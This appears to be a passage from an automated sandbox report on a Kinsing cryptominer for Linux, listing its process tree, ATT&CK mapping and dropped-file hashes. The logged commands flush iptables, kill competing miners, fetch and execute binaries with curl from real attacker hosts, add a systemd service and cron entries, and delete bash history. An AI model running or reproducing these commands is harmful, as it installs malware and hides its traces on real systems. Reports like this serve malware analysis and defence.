ip6tables -P OUTPUT ACCEPT
4⤵
PID:1692

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1693

/usr/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1694

/usr/bin/id
id -u
2⤵
PID:1695

/usr/bin/grep
grep -v grep
2⤵
PID:1699

/usr/bin/grep
grep -e /dev
2⤵
PID:1698

/usr/bin/ls
ls -la /etc
2⤵
PID:1697

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1709

/usr/bin/awk
awk "{if(\$3>80.0) print \$2}"
2⤵
PID:1708

/usr/bin/grep
grep -v grep
2⤵
PID:1707

/usr/bin/grep
grep agetty
2⤵
PID:1706

/usr/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1705

/usr/bin/pkill
pkill -f 42.112.28.216
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1718

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1724

/usr/bin/grep
grep -v -
2⤵
PID:1723

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1722

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1721

/usr/bin/grep
grep 207.38.87.6
2⤵
PID:1720

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1730

/usr/bin/grep
grep -v -
2⤵
PID:1729

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1728

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1727

/usr/bin/grep
grep 127.0.0.1:52018
2⤵
PID:1726

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1736

/usr/bin/grep
grep -v -
2⤵
PID:1735

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1734

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1733

/usr/bin/grep
grep 34.81.218.76:9486
2⤵
PID:1732

/usr/bin/grep
grep -v -
2⤵
PID:1743

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1742

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1744

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1741

/usr/bin/grep
grep 42.112.28.216:9486
2⤵
PID:1740

/usr/bin/pkill
pkill -f .git/kthreaddw
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1753

/usr/bin/pkill
pkill -f 80.211.206.105
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1766

/usr/bin/pkill
pkill -f 207.38.87.6
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1775

/usr/bin/pkill
pkill -f p8444
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1808

/usr/bin/pkill
pkill -f supportxmr
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1814

/usr/bin/pkill
pkill -f monero
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1820

/usr/bin/pkill
pkill -f kthreaddi
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1826

/usr/bin/pkill
pkill -f srv00
2⤵
- Reads CPU attributes
PID:1846

/usr/bin/pkill
pkill -f /tmp/.javae/javae
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1855

/usr/bin/pkill
pkill -f .javae
2⤵
- Reads CPU attributes
PID:1871

/usr/bin/pkill
pkill -f .syna
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1897

/usr/bin/pkill
pkill -f .main
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1934

/usr/bin/pkill
pkill -f xmm
2⤵
- Reads CPU attributes
PID:1942

/usr/bin/pkill
pkill -f solr.sh
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1956

/usr/bin/pkill
pkill -f /tmp/.solr/solrd
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1977

/usr/bin/pkill
pkill -f /tmp/javac
2⤵
- Reads CPU attributes
PID:2015

/usr/bin/pkill
pkill -f /tmp/.go.sh
2⤵
- Reads CPU attributes
PID:2052

/usr/bin/pkill
pkill -f /tmp/.x/agetty
2⤵
- Reads CPU attributes
PID:2066

/usr/bin/pkill
pkill -f /tmp/.x/kworker
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2088

/usr/bin/pkill
pkill -f c3pool
2⤵
- Reads CPU attributes
PID:2133

/usr/bin/pkill
pkill -f /tmp/.X11-unix/gitag-ssh
2⤵
- Reads CPU attributes
PID:2149

/usr/bin/pkill
pkill -f /tmp/1
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2150

/usr/bin/pkill
pkill -f /tmp/okk.sh
2⤵
- Reads CPU attributes
PID:2151

/usr/bin/pkill
pkill -f /tmp/gitaly
2⤵
- Reads CPU attributes
PID:2152

/usr/bin/pkill
pkill -f /tmp/.x/kworker
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2153

/usr/bin/pkill
pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
2⤵
- Reads CPU attributes
PID:2154

/usr/bin/pkill
pkill -f /tmp/.X11-unix/supervise
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2155

/usr/bin/pkill
pkill -f /tmp/.ssh/redis.sh
2⤵
- Reads CPU attributes
PID:2156

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2161

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2160

/usr/bin/grep
grep -v grep
2⤵
PID:2159

/usr/bin/grep
grep ./udp
2⤵
PID:2158

/usr/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2157

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2163

/usr/bin/cat
cat /tmp/.X11-unix/01
2⤵
PID:2162

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2165

/usr/bin/cat
cat /tmp/.X11-unix/11
2⤵
PID:2164

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2167

/usr/bin/cat
cat /tmp/.X11-unix/22
2⤵
PID:2166

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2169

/usr/bin/cat
cat /tmp/.pg_stat.0
2⤵
PID:2168

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2171

/usr/bin/cat
cat /tmp/.pg_stat.1
2⤵
PID:2170

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2173

/usr/bin/cat
cat /data/./oka.pid
2⤵
PID:2172

/usr/bin/pkill
pkill -f zsvc
2⤵
- Reads CPU attributes
PID:2174

/usr/bin/pkill
pkill -f pdefenderd
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2175

/usr/bin/pkill
pkill -f updatecheckerd
2⤵
- Reads CPU attributes
PID:2176

/usr/bin/pkill
pkill -f cruner
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2179

/usr/bin/pkill
pkill -f dbused
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2180

/usr/bin/pkill
pkill -f bashirc
2⤵
- Reads CPU attributes
PID:2181

/usr/bin/pkill
pkill -f meminitsrv
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2182

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2187

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2186

/usr/bin/grep
grep -v grep
2⤵
PID:2185

/usr/bin/grep
grep ./oka
2⤵
PID:2184

/usr/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2183

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2192

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2191

/usr/bin/grep
grep -v grep
2⤵
PID:2190

/usr/bin/grep
grep "postgres: autovacum"
2⤵
PID:2189

/usr/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2188

/usr/bin/grep
grep -v postgrey
2⤵
PID:2201

/usr/bin/grep
grep -v proxymap
2⤵
PID:2199

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2204

/usr/bin/grep
grep -v postgres
2⤵
PID:2200

/usr/bin/grep
grep -v kinsing
2⤵
PID:2202

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2203

/usr/bin/grep
grep -v php-fpm
2⤵
PID:2198

/usr/bin/grep
grep -v "\\["
2⤵
PID:2196

/usr/bin/grep
grep -v "("
2⤵
PID:2197

/usr/bin/grep
grep -v bin
2⤵
PID:2195

/usr/bin/awk
awk "length(\$1) == 8"
2⤵
PID:2194

/usr/bin/ps
ps ax -o "command,pid" -www
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2193

/usr/bin/grep
grep -v postgrey
2⤵
PID:2213

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2214

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2215

/usr/bin/grep
grep -v postgres
2⤵
PID:2212

/usr/bin/grep
grep -v proxymap
2⤵
PID:2211

/usr/bin/grep
grep -v php-fpm
2⤵
PID:2210

/usr/bin/grep
grep -v "("
2⤵
PID:2209

/usr/bin/grep
grep -v "\\["
2⤵
PID:2208

/usr/bin/grep
grep -v bin
2⤵
PID:2207

/usr/bin/awk
awk "length(\$1) == 16"
2⤵
PID:2206

/usr/bin/ps
ps ax -o "command,pid" -www
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2205

/usr/bin/grep
grep -v proxymap
2⤵
PID:2222

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2226

/usr/bin/grep
grep -v postgrey
2⤵
PID:2224

/usr/bin/awk
awk "{print \$1}"
2⤵
PID:2225

/usr/bin/grep
grep -v postgres
2⤵
PID:2223

/usr/bin/grep
grep -v php-fpm
2⤵
PID:2221

/usr/bin/grep
grep -v "("
2⤵
PID:2220

/usr/bin/grep
grep -v "\\["
2⤵
PID:2219

/usr/bin/grep
grep -v bin
2⤵
PID:2218

/usr/bin/awk
awk "length(\$5) == 8"
2⤵
PID:2217

/usr/bin/ps
ps ax
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2216

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2231

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2230

/usr/bin/grep
grep /tmp/sscks
2⤵
PID:2229

/usr/bin/grep
grep -v grep
2⤵
PID:2228

/usr/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2227

/usr/bin/chmod
chmod 777 /etc/kinsing
2⤵
PID:2236

/usr/bin/curl
curl -o /etc/kinsing https://bitbucket.org/eosakk11/reposit/raw/a93713d44b805f877da6fabe4b91a09b180486e1/kinsing
2⤵
PID:2237

/usr/bin/chmod
chmod +x /etc/kinsing
2⤵
PID:2239

/usr/bin/chmod
chmod 777 /etc/kinsing
2⤵
PID:2244

/usr/bin/curl
curl -o /etc/kinsing http://178.20.40.227/kinsing
2⤵
PID:2245

/usr/bin/chmod
chmod +x /etc/kinsing
2⤵
PID:2246

/usr/bin/chmod
chmod 777 /etc/libsystem.so
2⤵
PID:2255

/usr/bin/curl
curl -o /etc/libsystem.so http://178.20.40.227/libsystem.so
2⤵
PID:2256

/usr/bin/chmod
chmod +x /etc/libsystem.so
2⤵
PID:2257

/usr/bin/chmod
chmod 777 /etc/libsystem.so
2⤵
PID:2262

/usr/bin/curl
curl -o /etc/libsystem.so http://178.20.40.227/libsystem.so
2⤵
PID:2263

/usr/bin/chmod
chmod +x /etc/libsystem.so
2⤵
PID:2264

/usr/bin/rm
rm -rf /tmp/kdevtmpfsi
2⤵
PID:2269

/usr/bin/chmod
chmod 777 /etc/kinsing
2⤵
PID:2270

/usr/bin/chmod
chmod +x /etc/kinsing
2⤵
PID:2271

/etc/kinsing
/etc/kinsing
2⤵
- Executes dropped EXE
PID:2272

/usr/bin/id
id -u
2⤵
PID:2285

/usr/bin/systemctl
systemctl enable bot
2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2286

/usr/bin/systemctl
systemctl start bot
2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:2312

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2331

/usr/bin/sed
sed /base64/d
2⤵
PID:2330

/usr/bin/crontab
crontab -l
2⤵
PID:2329

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2334

/usr/bin/sed
sed /_cron/d
2⤵
PID:2333

/usr/bin/crontab
crontab -l
2⤵
PID:2332

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2337

/usr/bin/sed
sed /31.210.20.181/d
2⤵
PID:2336

/usr/bin/crontab
crontab -l
2⤵
PID:2335

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2340

/usr/bin/sed
sed /update.sh/d
2⤵
PID:2339

/usr/bin/crontab
crontab -l
2⤵
PID:2338

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2343

/usr/bin/sed
sed /logo4/d
2⤵
PID:2342

/usr/bin/crontab
crontab -l
2⤵
PID:2341

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2346

/usr/bin/sed
sed /logo9/d
2⤵
PID:2345

/usr/bin/crontab
crontab -l
2⤵
PID:2344

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2349

/usr/bin/sed
sed /logo0/d
2⤵
PID:2348

/usr/bin/crontab
crontab -l
2⤵
PID:2347

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2352

/usr/bin/sed
sed /logo/d
2⤵
PID:2351

/usr/bin/crontab
crontab -l
2⤵
PID:2350

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2355

/usr/bin/sed
sed /tor2web/d
2⤵
PID:2354

/usr/bin/crontab
crontab -l
2⤵
PID:2353

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2358

/usr/bin/sed
sed /jpg/d
2⤵
PID:2357

/usr/bin/crontab
crontab -l
2⤵
PID:2356

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2361

/usr/bin/sed
sed /png/d
2⤵
PID:2360

/usr/bin/crontab
crontab -l
2⤵
PID:2359

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2364

/usr/bin/sed
sed /tmp/d
2⤵
PID:2363

/usr/bin/crontab
crontab -l
2⤵
PID:2362

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2367

/usr/bin/sed
sed /zmreplchkr/d
2⤵
PID:2366

/usr/bin/crontab
crontab -l
2⤵
PID:2365

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2370

/usr/bin/sed
sed /aliyun.one/d
2⤵
PID:2369

/usr/bin/crontab
crontab -l
2⤵
PID:2368

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2373

/usr/bin/sed
sed /3.215.110.66.one/d
2⤵
PID:2372

/usr/bin/crontab
crontab -l
2⤵
PID:2371

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2376

/usr/bin/sed
sed /pastebin/d
2⤵
PID:2375

/usr/bin/crontab
crontab -l
2⤵
PID:2374

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2379

/usr/bin/sed
sed /onion/d
2⤵
PID:2378

/usr/bin/crontab
crontab -l
2⤵
PID:2377

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2382

/usr/bin/sed
sed /lsd.systemten.org/d
2⤵
PID:2381

/usr/bin/crontab
crontab -l
2⤵
PID:2380

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2385

/usr/bin/sed
sed /shuf/d
2⤵
PID:2384

/usr/bin/crontab
crontab -l
2⤵
PID:2383

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2388

/usr/bin/sed
sed /ash/d
2⤵
PID:2387

/usr/bin/crontab
crontab -l
2⤵
PID:2386

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2391

/usr/bin/sed
sed /mr.sh/d
2⤵
PID:2390

/usr/bin/crontab
crontab -l
2⤵
PID:2389

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2394

/usr/bin/sed
sed /185.181.10.234/d
2⤵
PID:2393

/usr/bin/crontab
crontab -l
2⤵
PID:2392

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2397

/usr/bin/sed
sed /localhost.xyz/d
2⤵
PID:2396

/usr/bin/crontab
crontab -l
2⤵
PID:2395

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2400

/usr/bin/sed
sed /45.137.151.106/d
2⤵
PID:2399

/usr/bin/crontab
crontab -l
2⤵
PID:2398

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2403

/usr/bin/sed
sed /111.90.159.106/d
2⤵
PID:2402

/usr/bin/crontab
crontab -l
2⤵
PID:2401

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2406

/usr/bin/sed
sed /github/d
2⤵
PID:2405

/usr/bin/crontab
crontab -l
2⤵
PID:2404

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2409

/usr/bin/sed
sed /bigd1ck.com/d
2⤵
PID:2408

/usr/bin/crontab
crontab -l
2⤵
PID:2407

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2412

/usr/bin/sed
sed /xmr.ipzse.com/d
2⤵
PID:2411

/usr/bin/crontab
crontab -l
2⤵
PID:2410

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2415

/usr/bin/sed
sed /185.181.10.234/d
2⤵
PID:2414

/usr/bin/crontab
crontab -l
2⤵
PID:2413

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2418

/usr/bin/sed
sed /146.71.79.230/d
2⤵
PID:2417

/usr/bin/crontab
crontab -l
2⤵
PID:2416

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2421

/usr/bin/sed
sed /122.51.164.83/d
2⤵
PID:2420

/usr/bin/crontab
crontab -l
2⤵
PID:2419

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2424

/usr/bin/sed
sed /newdat.sh/d
2⤵
PID:2423

/usr/bin/crontab
crontab -l
2⤵
PID:2422

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2427

/usr/bin/sed
sed /lib.pygensim.com/d
2⤵
PID:2426

/usr/bin/crontab
crontab -l
2⤵
PID:2425

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2430

/usr/bin/sed
sed /t.amynx.com/d
2⤵
PID:2429

/usr/bin/crontab
crontab -l
2⤵
PID:2428

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2433

/usr/bin/sed
sed /update.sh/d
2⤵
PID:2432

/usr/bin/crontab
crontab -l
2⤵
PID:2431

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2436

/usr/bin/sed
sed /systemd-service.sh/d
2⤵
PID:2435

/usr/bin/crontab
crontab -l
2⤵
PID:2434

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2439

/usr/bin/sed
sed /pg_stat.sh/d
2⤵
PID:2438

/usr/bin/crontab
crontab -l
2⤵
PID:2437

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2442

/usr/bin/sed
sed /sleep/d
2⤵
PID:2441

/usr/bin/crontab
crontab -l
2⤵
PID:2440

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2445

/usr/bin/sed
sed /oka/d
2⤵
PID:2444

/usr/bin/crontab
crontab -l
2⤵
PID:2443

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2448

/usr/bin/sed
sed /linux1213/d
2⤵
PID:2447

/usr/bin/crontab
crontab -l
2⤵
PID:2446

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2451

/usr/bin/sed
sed "/#wget/d"
2⤵
PID:2450

/usr/bin/crontab
crontab -l
2⤵
PID:2449

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2454

/usr/bin/sed
sed "/#curl/d"
2⤵
PID:2453

/usr/bin/crontab
crontab -l
2⤵
PID:2452

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2457

/usr/bin/sed
sed /zsvc/d
2⤵
PID:2456

/usr/bin/crontab
crontab -l
2⤵
PID:2455

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2460

/usr/bin/sed
sed /givemexyz/d
2⤵
PID:2459

/usr/bin/crontab
crontab -l
2⤵
PID:2458

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2463

/usr/bin/sed
sed /world/d
2⤵
PID:2462

/usr/bin/crontab
crontab -l
2⤵
PID:2461

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2466

/usr/bin/sed
sed /1.sh/d
2⤵
PID:2465

/usr/bin/crontab
crontab -l
2⤵
PID:2464

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2469

/usr/bin/sed
sed /3.sh/d
2⤵
PID:2468

/usr/bin/crontab
crontab -l
2⤵
PID:2467

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2472

/usr/bin/sed
sed /workers/d
2⤵
PID:2471

/usr/bin/crontab
crontab -l
2⤵
PID:2470

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2475

/usr/bin/sed
sed /oracleservice/d
2⤵
PID:2474

/usr/bin/crontab
crontab -l
2⤵
PID:2473

/usr/bin/grep
grep -v grep
2⤵
PID:2478

/usr/bin/grep
grep -e 185.191.32.198
2⤵
PID:2477

/usr/bin/crontab
crontab -l
2⤵
PID:2476

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:2480

/usr/bin/rm
rm -rf /root/.bash_history
2⤵
PID:2482

/usr/bin/awk
awk "{ print \$1 }"
1⤵
PID:2235

/usr/bin/md5sum
md5sum /etc/kinsing
1⤵
PID:2234

/usr/bin/awk
awk "{ print \$1 }"
1⤵
PID:2243

/usr/bin/md5sum
md5sum /etc/kinsing
1⤵
PID:2242

/usr/bin/awk
awk "{ print \$1 }"
1⤵
PID:2250

/usr/bin/md5sum
md5sum /etc/kinsing
1⤵
PID:2249

/usr/bin/awk
awk "{ print \$1 }"
1⤵
PID:2254

/usr/bin/md5sum
md5sum /etc/libsystem.so
1⤵
PID:2253

/usr/bin/awk
awk "{ print \$1 }"
1⤵
PID:2261

/usr/bin/md5sum
md5sum /etc/libsystem.so
1⤵
PID:2260

/usr/bin/awk
awk "{ print \$1 }"
1⤵
PID:2268

/usr/bin/md5sum
md5sum /etc/libsystem.so
1⤵
PID:2267

/usr/bin/crontab
crontab -l
1⤵
PID:2481

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/kinsing

Filesize
14KB

MD5
9f307e91338a528a24efd7655c45af4f

SHA1
7a7be0598f926143c686aa054af22679884f3ab7

SHA256
eebad51242fbebee5bf62dae3d5864b95fc393c0d680b021a6544fce83cb5b8e

SHA512
e778503e3772ccbd36076bc861ab2f1fbe5876586d9cf88f9cae154d25f12c94ee224e33384c4ff3b31b262744d9624ac61d499d8ef1bf3bb261ae1f0e14b244

Download Submit
/etc/kinsing

Filesize
1KB

MD5
5343c1a8b203c162a3bf3870d9f50fd4

SHA1
04b5b886c20d88b57eea6d8ff882624a4ac1e51d

SHA256
dc1d54dab6ec8c00f70137927504e4f222c8395f10760b6beecfcfa94e08249f

SHA512
e0f50acb6061744e825a4051765cebf23e8c489b55b190739409d8a79bb08dac8f919247a4e5f65a015ea9c57d326bbef7ea045163915129e01f316c4958d949

Download Submit
/usr/lib/systemd/system/bot.service

Filesize
193B

MD5
a3e1220eacdbd3fa5d0117efd5d4dd91

SHA1
b66492d74a517bcd9d230b574b56411476124709

SHA256
05d02411668f4ebd576a24ac61cc84e617bdb66aa819581daa670c65f1a876f0

SHA512
78d27f45518a7fce636ef790ee215b1f47b2939e02cf6c5118897a703cc15ed4c283838d30a275e309304415d2a58e2e4a07d99127ec9ff32221d94e6547ca1f

Download Submit
/var/spool/cron/crontabs/tmp.TPeEHK

Filesize
250B

MD5
1c65f751895155ce39528d96ad359740

SHA1
e0e2fa5d6af8a2d4e3421ace4929c4cd233942d5

SHA256
35834c2762291ff321c8eb9d10157a6bdeb95849c8befe2683e486e6237a3dc0

SHA512
db46cc9c259c1dd0543c35287a1f70edc633886c7b0449c8ff318d64c32b92e608334284a6bb3c6ee63eaea39158fbc7586102497af5e5c258cc73fb7205dd79

Download Submit
/var/spool/cron/crontabs/tmp.buGaEq

Filesize
175B

MD5
ecc06ff1f73b6e3948bd5ec5bdff9de8

SHA1
17e11bf90fe9726d452768da4d0cdb07c5b28ea4

SHA256
d7f3ccfe89719308dc27782b9573c7b6ff8f7728a22f106131f3bf99f13fd4fa

SHA512
685e0ac61dd6c57aedaafc13767cceb90039d643aad2c11c293bb002b690e0543ced1dd2b29fdba6b3a480923f914fa4e41337aebe08862fb97752c144deb4f2

Download Submit
/var/spool/cron/crontabs/tmp.kHyilQ

Filesize
175B

MD5
60d5f8ec922d47985d3cf355be70330c

SHA1
68ed939dadc8b375b7259dea93a2d9f692ebb8e3

SHA256
ce6399d65681464f143b91f0ac8125d5b8ee52d56c30766c6e23f049f28b825f

SHA512
ff3180737a8d12c581ed874024eae3bf33333cfa4cb6fad7859ad20f56c8122b332bcf1975f49af671ed5010d7838ac3c598672180acce8bab94123493ba8d3a

Download Submit